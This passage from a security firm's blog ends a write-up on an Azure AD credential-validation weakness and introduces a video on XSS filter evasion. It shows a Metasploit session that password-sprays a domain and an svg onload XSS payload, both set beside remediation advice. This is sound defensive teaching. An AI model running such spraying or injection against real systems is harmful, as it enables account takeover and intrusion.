    When you run the module, every username/password pair is tested using the authentication XML request shown above to validate the pairing. When a valid username/password pairing is found, the DesktopSsoToken is also displayed to the user, as shown here:

    Example Azure AD Login Module Usage
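
    For reference, a representative msfconsole session looks like the following. The domain comes from the example above; the wordlist path and password are placeholders:

    msf6 > use auxiliary/scanner/http/azure_ad_login
    msf6 auxiliary(scanner/http/azure_ad_login) > set DOMAIN bionicle.dev
    msf6 auxiliary(scanner/http/azure_ad_login) > set USER_FILE /path/to/usernames.txt
    msf6 auxiliary(scanner/http/azure_ad_login) > set PASSWORD Winter2022!
    msf6 auxiliary(scanner/http/azure_ad_login) > run
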
    Remediation and Protection

    As of this writing, there is no direct remediation for this vulnerability if your organization is using Azure AD with Single Sign-On. Microsoft has deemed this part of the normal workflow, and thus there are no known plans to remediate the endpoint. From a defender’s point of view, this vulnerability is particularly difficult to defend against due to the lack of logs from invalid login attempts. Raxis recommends the following to help defend against this vulnerability:

    • Ensure users set strong passwords in Active Directory by having a strong password policy.
    • Enable Multi-Factor Authentication on all services that may use AD credentials in case a valid username/password pair is discovered.
    • Consider setting a Smart Lockout policy in Azure that will lock out accounts targeted by brute-force attacks. This won’t help against password spraying, but it will help against brute-force attacks aimed at a single user.
    • Monitor for unusual successful logins from users (e.g. unusual locations).
    • Educate users about password hygiene so that they can learn to set strong passwords that won’t be caught by password spraying attacks.

     

  • Cross-Site Scripting (XSS): Filter Evasion and Sideloading

    Cross-Site Scripting (XSS): Filter Evasion and Sideloading

    This is the second video in my three-part series about cross-site scripting (XSS), a type of injection attack that results from user-supplied data that is not properly sanitized or filtered by an application. In the previous video, I discussed the basics of how XSS works and offered some recommendations on how to protect against it.

    In this video, we’ll take it a step further. I’ll show you some techniques hackers use to get past common remediation efforts. First is filter evasion, which uses different types of tags to insert malicious code when filters are in place to prevent scripts from running. The second is a technique I call sideloading content, importing third-party content in order to deliver a malicious payload.
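
    As a simple illustration of filter evasion: if an application strips script tags but still reflects other HTML, an attacker can fall back to an event handler on a tag the filter allows, for example:

    <svg onload="alert(document.domain)">

    The exact payload depends on which tags and attributes the filter lets through, which is why filtering alone is rarely a complete fix.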

    Injection attacks are number three on the OWASP Top 10 list of frequently occurring vulnerabilities, and, indeed, they are a finding Raxis discovers quite frequently. (Over the past year, I have discovered five XSS CVEs.) So, in addition to explaining how these attacks work, I also explain how to stop them.

    In my next video, we’ll take a look at some more advanced methods for cross-site scripting, again with some remediation tips included. So, if you haven’t done so already, please subscribe to our YouTube channel and watch for new content from the Raxis team.

    Want to learn more? Take a look at the first part in our Cross-Site Scripting Series.